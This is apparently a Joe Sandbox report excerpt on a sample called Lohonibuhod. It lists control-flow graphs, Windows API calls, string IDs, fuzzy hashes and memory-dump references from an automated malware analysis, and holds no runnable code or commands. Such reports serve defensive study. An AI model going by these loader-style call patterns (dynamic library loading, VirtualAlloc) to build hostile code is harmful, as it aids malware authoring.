            • Instruction ID: f094b2a649a24d5681c3d571a21ce20a7fdc0a31d332c37fd24c43dfc87827bc
            • Opcode Fuzzy Hash: 16c968df11c80f4839faa5dd0be9cb8f858190d9a875e5543b79e2ab491c8c70
            • Instruction Fuzzy Hash: 44F06D36240225EFFA229F51CDCAF46BB61EB457E2F264020F340260B8C6737820DB18
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,100022C1,00000000,00000001,00000000), ref: 10002521
            • RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,100022C1,00000000,00000001,00000000), ref: 10002555
            • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004), ref: 1000256F
            • HeapFree.KERNEL32(00000000,?), ref: 10002586
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: Heap$Alloc$AllocateFreeVirtual
            • String ID:
            • API String ID: 1005975451-0
            • Opcode ID: dbe84276b22d936fcf28fe8366a40f9be5e16de133823684676681efb08bdf82
            • Instruction ID: 59a76fa856539d024bcd95d47298204902c07f09fe04d0fd7388b831c6c067a5
            • Opcode Fuzzy Hash: dbe84276b22d936fcf28fe8366a40f9be5e16de133823684676681efb08bdf82
            • Instruction Fuzzy Hash: 4A115870200B62DFE721CF18CCC5A177BB1FB897E27214A19E262D61B8D7729955CF14
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 57 10001301-10001388 GetProcAddress * 2 LoadLibraryA
            APIs
            • GetProcAddress.KERNEL32(?,?,?,00000000,100051F0,10005274,1000105A,00000000,100051F0), ref: 1000131C
            • GetProcAddress.KERNEL32(?,?), ref: 10001349
            • LoadLibraryA.KERNEL32(?,?), ref: 10001362
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: AddressProc$LibraryLoad
            • String ID:
            • API String ID: 2238633743-0
            • Opcode ID: bef49b88d6b5075293cb2dd027ad9f0e01b9d6818a79c35dc3587d6c8c11ba85
            • Instruction ID: 25ec328a141864f677c70b46ba774ab13fbe30923e3e3e84977e3dfd8e9a3d85
            • Opcode Fuzzy Hash: bef49b88d6b5075293cb2dd027ad9f0e01b9d6818a79c35dc3587d6c8c11ba85
            • Instruction Fuzzy Hash: AC11C575200104EFDB14CF28C894E65BBE9FF5C358B24446DEA59DB361C732AD51CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • HeapCreate.KERNELBASE(00000000,00001000,00000000,100013AA,00000000), ref: 1000162A
              • Part of subcall function 10001E5C: HeapAlloc.KERNEL32(00000000,00000140,1000163E), ref: 10001E69
            • HeapDestroy.KERNEL32 ref: 10001648
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: Heap$AllocCreateDestroy
            • String ID:
            • API String ID: 2236781399-0
            • Opcode ID: f0ff528cfb4eee2c5d7f4ce2a576517689442160b2c3fce08d867651e9050fc8
            • Instruction ID: 78912efd5ff2d260f7491fd618bbb40f792ba6e4c89580ae4997f8cedd4c86b7
            • Opcode Fuzzy Hash: f0ff528cfb4eee2c5d7f4ce2a576517689442160b2c3fce08d867651e9050fc8
            • Instruction Fuzzy Hash: 9AE01274754311AAFF404B308DC97A636D5EB487C3F094425FA00C90BCEB72C540D611
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 68 401633-40163a 69 401648-40165e __dllonexit 68->69 70 40163c-401647 _onexit 68->70
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.364623768.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000006.00000002.364621493.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
            • Associated: 00000006.00000002.364626020.0000000000402000.00000002.00000001.01000000.0000000B.sdmpDownload File
            • Associated: 00000006.00000002.364628456.0000000000404000.00000002.00000001.01000000.0000000B.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_Lohonibuhod.jbxd
            Similarity
            • API ID: __dllonexit_onexit
            • String ID:
            • API String ID: 2384194067-0
            • Opcode ID: 26373c43a83e90b80799868412e9c9f3cfb509f275866719a99443ef04029b5d
            • Instruction ID: 81ddecd9d749891d54268572d570dc8348f50d7a07813ebda20330d722522a00
            • Opcode Fuzzy Hash: 26373c43a83e90b80799868412e9c9f3cfb509f275866719a99443ef04029b5d
            • Instruction Fuzzy Hash: FCC01230440300FBCA001F20BD0E5467F25A75573BB60863BF1A9351F6C7794610FA4D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 71 100025aa-100025ba 72 100025bc-100025be 71->72 73 100025c0-100025c3 72->73 74 100025c5-100025d7 72->74 73->72 75 100025da-100025e4 74->75 75->75 76 100025e6-10002603 VirtualAlloc 75->76 77 10002605-10002608 76->77 78 1000260d-10002615 76->78 81 100026a0-100026a4 77->81 79 10002653-1000268b 78->79 80 10002617 78->80 83 10002690-1000269e 79->83 84 1000268d 79->84 82 1000261a-10002651 80->82 82->79 82->82 83->81 84->83
            APIs
            • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,-000000C9,?,100022D0,000000E0,00000000,00000001,00000000), ref: 100025FB
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: c024661bb34bb728b433060c083a65a30a491f3d0f3aa2d51cacd4275a428c02
            • Instruction ID: 514d770ac0748508e8fa3d1f3530390eec8423c13d8c92a20f474f81a8b783d2
            • Opcode Fuzzy Hash: c024661bb34bb728b433060c083a65a30a491f3d0f3aa2d51cacd4275a428c02
            • Instruction Fuzzy Hash: 3431AC716006068FE314CF18C894BA5BBE4FF443A4F25C2BEE5598B2A2D771E946CB40
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 85 100026e3-100026ee 86 100026f0-100026f1 call 100021f0 85->86 87 100026fb-100026fd 85->87 91 100026f6-100026f9 86->91 89 10002702-10002711 HeapAlloc 87->89 90 100026ff-10002701 87->90 92 10002717-10002718 89->92 90->89 91->87 91->92
            APIs
            • HeapAlloc.KERNEL32(00000000,-0000000E,00000000,100026C7,000000E0,100026B4,00000001,10001CA6,00000001,?,?,?,?,?,?,100013F1), ref: 10002711
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: AllocHeap
            • String ID:
            • API String ID: 4292702814-0
            • Opcode ID: 5db8cd96a34996fa335975745d6068250055bd7a4f9e48c63ee29c7f0749d283
            • Instruction ID: 7e25c0309bd6ba2bcfcb9b935d83e6d0fcf1ed80e2c121a0a829253fb72fbfa7
            • Opcode Fuzzy Hash: 5db8cd96a34996fa335975745d6068250055bd7a4f9e48c63ee29c7f0749d283
            • Instruction Fuzzy Hash: C3E08C3390953156F910A318AD81BCB3754DF053E1F070120FD587A0ECCB612C8045C4
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 162 401250-40128f ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z 163 401291-4012b2 162->163 164 4012b5-4012c5 162->164 163->164 165 4012c7-4012c9 164->165 166 4012cb 164->166 167 4012ce-4012d2 165->167 166->167 168 4012d4-4012d7 167->168 169 4012de-4012e0 167->169 168->169 170 4012d9-4012dc 168->170 171 4012e2-4012e4 169->171 172 4012e6 169->172 170->168 170->169 173 4012e9-4012eb 171->173 172->173 174 401316-401366 GetSidLengthRequired CreateConsoleScreenBuffer 173->174 175 4012ed-4012fc 173->175 176 401368-40136b 174->176 177 40136d 174->177 178 401302 175->178 179 4012fe-401300 175->179 176->177 181 401373-4013a2 sexuhus ??2@YAPAXI@Z call 401080 176->181 177->181 180 401305-401308 178->180 179->180 180->169 182 40130a-40130d 180->182 187 4013a4-4013b3 181->187 188 4013b5-4013ba 181->188 182->169 184 40130f-401312 182->184 184->182 186 401314 184->186 186->169 189 4013be-4013c4 187->189 188->189 190 4013d4-4013fe call 401628 Nuhazelaxim 189->190 191 4013c6-4013c9 189->191 197 401604-40160f exit 190->197 198 401404-401438 isupper call 401180 190->198 193 4013cb-4013cc 191->193 194 4013ce 191->194 195 4013d1 193->195 194->195 195->190 201 401440-401487 bibezarebowu ??2@YAPAXI@Z 198->201 202 40143a 198->202 203 40148c-40148e 201->203 202->201 204 401490-401492 203->204 205 401494-4014ae call 4011c0 203->205 204->205 206 4014b1-4014b3 204->206 205->206 206->203 208 4014b5-40150a call 401628 zejutuhodomo ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z 206->208 212 40152b-401554 _strdup 208->212 213 40150c-401528 208->213 214 401594-40159a 212->214 215 401556-401559 212->215 213->212 218 4015b8-4015ca 214->218 219 40159c-4015a1 214->219 216 401566-401568 215->216 217 40155b-401564 215->217 216->214 222 40156a-40157b 216->222 217->216 217->217 220 4015f5-401601 218->220 221 4015cc-4015d1 218->221 223 4015a3-4015a5 219->223 224 4015ae-4015b5 call 401628 219->224 226 4015d3-4015d5 221->226 227 4015eb-4015f2 call 401628 221->227 228 40157d-401580 222->228 229 40158e-401592 222->229 223->224 230 4015a7-4015ac 223->230 224->218 226->227 232 4015d7-4015e8 226->232 227->220 228->229 234 401582-40158c 228->234 229->214 229->215 230->218 234->228 234->229
            APIs
            • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,?,00000000), ref: 00401269
            • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,00000000), ref: 00401287
            • GetSidLengthRequired.ADVAPI32(?,?,00000001,?,?,?,00000000), ref: 00401328
            • CreateConsoleScreenBuffer.KERNEL32 ref: 00401352
            • sexuhus.JAHULOCAYEDO(?,?,00000001,?,?,?,00000000), ref: 00401378
            • ??2@YAPAXI@Z.MSVCRT ref: 00401386
              • Part of subcall function 00401628: free.MSVCRT(00000000,004013EE,00000000,?,?,00000000), ref: 0040162C
            • Nuhazelaxim.YIDUYEVUTOG(00000000,00000000,?,?,00000000), ref: 004013EF
            • isupper.MSVCRT ref: 00401415
            • bibezarebowu.FIROZEDIKAMI(00000003,?,?,?,?,00000005,?,?,?,?,?,?,?,00000000), ref: 0040145D
            • ??2@YAPAXI@Z.MSVCRT ref: 00401474
            • zejutuhodomo.NASEROPUXEQ(?,?,?,00000000,?,?,?,00000005,?,?,?,?,?,?,?,00000000), ref: 004014CF
            • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,?,00000005), ref: 00401502
            • _strdup.MSVCRT(00403020,?,00000001,?,?,?,?,?,?,?,00000005), ref: 00401542
            • exit.MSVCRT ref: 00401606
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.364623768.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000006.00000002.364621493.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
            • Associated: 00000006.00000002.364626020.0000000000402000.00000002.00000001.01000000.0000000B.sdmpDownload File
            • Associated: 00000006.00000002.364628456.0000000000404000.00000002.00000001.01000000.0000000B.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_Lohonibuhod.jbxd
            Similarity
            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??2@Grow@?$basic_string@$BufferConsoleCreateLengthNuhazelaximRequiredScreenTidy@?$basic_string@_strdupbibezarebowuexitfreeisuppersexuhuszejutuhodomo
            • String ID: D0@$D0@
            • API String ID: 1810937992-2163784678
            • Opcode ID: d203b04e52820c781a00f1add7da1b6300ef2eb0ac00234db61bdd8a3f930eb9
            • Instruction ID: d8dad6136998a42da6945c55500197d0af9414846aa5ac43a8f236ca2278ecf8
            • Opcode Fuzzy Hash: d203b04e52820c781a00f1add7da1b6300ef2eb0ac00234db61bdd8a3f930eb9
            • Instruction Fuzzy Hash: 84B156706043409FD724CF28DD9166BBBE5AB89301F58493FE986BB3E1D6389A05CB4D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 236 10002fd5-10002fe0 237 10002fe2-10002ff1 LoadLibraryA 236->237 238 10003024-1000302b 236->238 239 10002ff3-10003008 GetProcAddress 237->239 240 1000305a-1000305c 237->240 241 10003043-1000304f 238->241 242 1000302d-10003033 238->242 239->240 244 1000300a-1000301f GetProcAddress * 2 239->244 243 10003056-10003059 240->243 241->243 242->241 246 10003035-1000303c 242->246 244->238 246->241 247 1000303e-10003041 246->247 247->241
            APIs
            • LoadLibraryA.KERNEL32(user32.dll), ref: 10002FE7
            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10002FFF
            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10003010
            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 1000301D
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: AddressProc$LibraryLoad
            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
            • API String ID: 2238633743-4044615076
            • Opcode ID: 49a944e3231b6e706c789a9ad4cc1282d3c311ed64a976ff2b4ae1f70f1e9cf3
            • Instruction ID: 09b9e86ffa65fbe342752e343ebc9caef3bc20d7d0779b60b1455dae67716503
            • Opcode Fuzzy Hash: 49a944e3231b6e706c789a9ad4cc1282d3c311ed64a976ff2b4ae1f70f1e9cf3
            • Instruction Fuzzy Hash: 9E018FB5602221AFF702CFB48CD4A5B7BECEB585D23425029F305D3128DF768A019B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 249 100034b0-100034de 250 100034e0-100034fa LCMapStringW 249->250 251 10003526-10003529 249->251 252 10003504-10003516 LCMapStringA 250->252 253 100034fc-10003502 250->253 254 1000353b-10003543 251->254 255 1000352b-10003538 call 100036d4 251->255 258 1000351c 252->258 259 1000363e 252->259 253->251 256 10003562-10003565 254->256 257 10003545-1000355d LCMapStringA 254->257 255->254 256->259 262 1000356b-1000356e 256->262 261 10003640-10003651 257->261 258->251 259->261 264 10003570-10003575 262->264 265 10003578-1000359c MultiByteToWideChar 262->265 264->265 265->259 266 100035a2-100035d6 call 10003a20 265->266 266->259 270 100035d8-100035ef MultiByteToWideChar 266->270 270->259 271 100035f1-1000360a LCMapStringW 270->271 271->259 272 1000360c-10003610 271->272 273 10003652-10003688 call 10003a20 272->273 274 10003612-10003615 272->274 273->259 281 1000368a-100036a0 LCMapStringW 273->281 276 1000361b-1000361e 274->276 277 100036cd-100036cf 274->277 276->259 279 10003620-10003638 LCMapStringW 276->279 277->261 279->259 279->277 281->259 282 100036a2-100036a7 281->282 283 100036a9-100036ab 282->283 284 100036ad-100036b0 282->284 285 100036b3-100036c7 WideCharToMultiByte 283->285 284->285 285->259 285->277
            APIs
            • LCMapStringW.KERNEL32(00000000,00000100,100043C0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 100034F2
            • LCMapStringA.KERNEL32(00000000,00000100,100043BC,00000001,00000000,00000000), ref: 1000350E
            • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 10003557
            • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 1000358F
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 100035E7
            • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 100035FD
            • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 10003630
            • LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 10003698
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: String$ByteCharMultiWide
            • String ID:
            • API String ID: 352835431-0
            • Opcode ID: 855ae5721975aee6c9e0a35035b7793e6aaf39e7440f679f12da0cea1cf40c02
            • Instruction ID: 4c5bb73f013cab1c6f7c12613be114ae7c2c48ecb446f4eb1073e524c9067a0a
            • Opcode Fuzzy Hash: 855ae5721975aee6c9e0a35035b7793e6aaf39e7440f679f12da0cea1cf40c02
            • Instruction Fuzzy Hash: C5517872900249FBEF22CF95CC84A9F7BB9FB487D0F118119FA14A1268D7329A10DB61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 286 21000-21066 287 21068-21074 286->287 288 21076-2107b 287->288 289 2107d-2107f 287->289 288->287 288->289 290 21106-21112 289->290 291 21085-2109d 289->291 294 21114-21116 290->294 292 210e5-21101 toupper * 2 291->292 293 2109f-210a6 291->293 292->290 293->292 295 210a8-210c9 toupper * 2 293->295 296 21171-2119c wsprintfA 294->296 297 21118-2111e 294->297 295->292 298 210cb-210e3 295->298 297->296 299 21120 297->299 298->292 298->293 300 21122-21128 299->300 301 2112a-2116f call 21270 call 211b0 299->301 300->296 300->301 301->294
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.364588049.0000000000021000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00020000, based on PE: true
            • Associated: 00000006.00000002.364585750.0000000000020000.00000002.00000001.01000000.0000000D.sdmpDownload File
            • Associated: 00000006.00000002.364590151.0000000000022000.00000002.00000001.01000000.0000000D.sdmpDownload File
            • Associated: 00000006.00000002.364592294.0000000000024000.00000002.00000001.01000000.0000000D.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_20000_Lohonibuhod.jbxd
            Similarity
            • API ID: toupper$__allremwsprintf
            • String ID: %I6
            • API String ID: 2402622903-801520844
            • Opcode ID: 0be28cb861da07e3b17897218c5ed904d3a9ffb6f0add5f0731a8c8a2366ec37
            • Instruction ID: a1a75057446fa96ee258feb4d9b88e23d723e80aae2239dde555ece15b4b8fc3
            • Opcode Fuzzy Hash: 0be28cb861da07e3b17897218c5ed904d3a9ffb6f0add5f0731a8c8a2366ec37
            • Instruction Fuzzy Hash: 1A410571A00154AFF720CB78FC905AABBF5E759310328066AE944C32A1D77C8B16CB64
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 10001D76
            • GetStdHandle.KERNEL32(000000F4,100042F4,00000000,?,00000000,00000000), ref: 10001E4C
            • WriteFile.KERNEL32(00000000), ref: 10001E53
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: File$HandleModuleNameWrite
            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
            • API String ID: 3784150691-4022980321
            • Opcode ID: 06d94f5684f212a408199dcccfad84c9767cf989d3c5a332ece30ef5d8ddfc03
            • Instruction ID: 12d08507676daea1b6c2e72e2ddab763b32ec051a1d2239a28ebf34ab02f6107
            • Opcode Fuzzy Hash: 06d94f5684f212a408199dcccfad84c9767cf989d3c5a332ece30ef5d8ddfc03
            • Instruction Fuzzy Hash: 0B31C1B2A00219AFFB10DBA0CC85FDE77BDEB453C0F110466F644E605DEB74AA448B51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,100013F1), ref: 10001BB9
            • GetEnvironmentStrings.KERNEL32(?,?,?,?,100013F1), ref: 10001BCD
            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,100013F1), ref: 10001BF9
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,100013F1), ref: 10001C31
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,100013F1), ref: 10001C53
            • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,100013F1), ref: 10001C6C
            • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,100013F1), ref: 10001C7F
            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 10001CBD
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
            • String ID:
            • API String ID: 1823725401-0
            • Opcode ID: 0168f4ae92ed445595a3979691d59d356b5665e82a06f7d9d48edbbe6ddaae78
            • Instruction ID: dae52657fee3e9ec5a16757c2413bf873a257e6dfecc64e0f04b01ef60e63039
            • Opcode Fuzzy Hash: 0168f4ae92ed445595a3979691d59d356b5665e82a06f7d9d48edbbe6ddaae78
            • Instruction Fuzzy Hash: 4B31C5B25482666FF310EFB45CC4CAB76DCE7492D97130929F655D3108EA71CC4147A5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetStringTypeW.KERNEL32(00000001,100043C0,00000001,00000000,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 1000373E
            • GetStringTypeA.KERNEL32(00000000,00000001,100043BC,00000001,?), ref: 10003758
            • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 1000378C
            • MultiByteToWideChar.KERNEL32(10002B99,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 100037C4
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 1000381A
            • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 1000382C
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: StringType$ByteCharMultiWide
            • String ID:
            • API String ID: 3852931651-0
            • Opcode ID: 894c64aca5469eba838abde4285f91193999ec3512647c7fc1f8926f74e1cf01
            • Instruction ID: bc9f20c0ccc02961af6768ffb7fee715c847f53d1467b43647a15e73684080cd
            • Opcode Fuzzy Hash: 894c64aca5469eba838abde4285f91193999ec3512647c7fc1f8926f74e1cf01
            • Instruction Fuzzy Hash: C7418DB190425AAFEB22CF98CC85ADF7FBCEB046D0F118529FA05E2254DB319910CB90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: FileHandleType$CountInfoStartup
            • String ID:
            • API String ID: 1710529072-0
